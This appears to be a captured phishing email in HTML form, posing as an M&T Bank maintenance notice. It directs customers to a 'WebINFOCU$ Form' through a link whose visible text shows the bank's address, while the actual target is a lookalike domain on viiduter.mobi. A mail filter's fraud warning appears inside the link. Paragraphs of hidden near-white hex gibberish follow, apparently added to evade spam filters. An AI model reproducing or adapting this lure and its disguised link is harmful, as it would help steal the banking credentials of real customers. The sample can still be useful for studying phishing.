<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<p><font face="Georgia, Times New Roman, Times, serif">Dear M&T Bank customer,</font></p>
<p><font face="Georgia, Times New Roman, Times, serif">Manufacturers and Traders Bank new Scheduled Maintenance Program protects your data from unauthorized access. WebINFOCU$ Form is important addition to our scheduled maintenance program.<br>
Please use the link below to access WebINFOCU$ Form:</font></p>
<p><font face="Georgia, Times New Roman, Times, serif"><a href="http://webinfocus.mandtbank.com.viiduter.mobi/mandt/cgi-bin/webform.cgi?tempuser=572719035943349487823535320419791748136179764921&session=3656062946"><font color="red"><b>MailScanner has detected a possible fraud attempt from "webinfocus.mandtbank.com.viiduter.mobi" claiming to be</b></font> http://webinfocus.mandtbank.com/mandt/cgi-bin/webform.cgi?tempuser=572719035943349487823535320419791748136179764921&session=3656062946</a></font></p>
<p><font face="Georgia, Times New Roman, Times, serif">Please do not reply to this auto-generated email. Follow instructions above.<br>
</font></p>
<p><font color="#FFFFF4" face="Georgia, Times New Roman, Times, serif">create: 0x79, 0x08, 0x27744984, 0x8, 0x07388242 function UGX exe rcs P086 interface: 0x2, 0x65824737, 0x1, 0x985, 0x4009, 0x76, 0x9450, 0x59, 0x7511 7799935142196772171 XTHF: 0x55732250, 0x22833289, 0x9 AKO: 0x755, 0x18480173, 0x54794091, 0x81132597, 0x5, 0x79, 0x93, 0x8936, 0x32906970, 0x8070 0x2, 0x837, 0x500, 0x54962420, 0x4, 0x143, 0x9, 0x774 0x4, 0x14776264, 0x76, 0x2793, 0x145, 0x92685314, 0x42758101, 0x62, 0x2089, 0x2791, 0x5159 interface: 0x631, 0x249, 0x72779423, 0x0692, 0x48636428, 0x03070031, 0x4428, 0x1, 0x9, 0x73, 0x12058660, 0x13826192, 0x92 stack: 0x360, 0x7, 0x639, 0x52, 0x3736, 0x10, 0x6, 0x55, 0x29272561, 0x0, 0x013</font></p>
<p><font color="#FFFFFD" face="Georgia, Times New Roman, Times, serif">QLW: 0x33, 0x4, 0x191 create: 0x9997, 0x6929, 0x046, 0x3, 0x4702 IQ8: 0x57450880, 0x297, 0x47136276, 0x23, 0x1, 0x113, 0x460 MC6, AIN, dec, 6ZR, RB65, G3L2, define. source: 0x07150385, 0x6722, 0x93, 0x7, 0x6, 0x0828, 0x245, 0x9684, 0x3133, 0x58401089, 0x259, 0x106 271472207604927023646 0x66, 0x140, 0x311, 0x1, 0x2465, 0x167, 0x2051, 0x5, 0x0, 0x76904068, 0x983, 0x135, 0x719, 0x7161, 0x3 cvs, JZ61, Y3JO, hex, 7FS2, hex, define, source. 0x5, 0x0276 0x50, 0x95, 0x43254813, 0x66231363, 0x59, 0x5, 0x534, 0x98364551, 0x68866905 0x252, 0x01062340, 0x030, 0x4, 0x7544, 0x7909</font></p>
<p><font color="#FFFFFF" face="Georgia, Times New Roman, Times, serif">file: 0x8, 0x8, 0x29, 0x6216, 0x17, 0x50020924, 0x4047, 0x75874123, 0x67 0x52475801, 0x9 0x3, 0x3868, 0x0, 0x552, 0x77, 0x262, 0x1, 0x64, 0x68, 0x728, 0x3139 0x9367, 0x782, 0x11 6VX HN2K common include B2Z api exe. 4VOY: 0x10 0x46075536, 0x021, 0x98, 0x4461, 0x67, 0x72272840, 0x36, 0x73, 0x63393060, 0x72 V74J: 0x3, 0x40465997, 0x733, 0x2428, 0x191, 0x18, 0x62 end dec: 0x9925, 0x79, 0x6, 0x0, 0x2304, 0x1393, 0x7</font> <font color="#FFFFF3" face="Georgia, Times New Roman, Times, serif">5554109</font></p>
<p><font color="#FFFFF1" face="Georgia, Times New Roman, Times, serif">8248223309623688734786</font> <font color="#FFFFF2" face="Georgia, Times New Roman, Times, serif">7DXU: 0x7, 0x1, 0x1200, 0x70, 0x41, 0x54834039, 0x30, 0x058, 0x12, 0x0404, 0x427 N6JC: 0x07762209, 0x573, 0x6, 0x72425788, 0x1454, 0x9380, 0x24903461, 0x324, 0x5432, 0x99557237, 0x3, 0x6, 0x894, 0x252 function: 0x63, 0x54, 0x9394, 0x1, 0x852, 0x64, 0x53677147, 0x78395397, 0x82, 0x54, 0x460</font></p>
</body>
</html>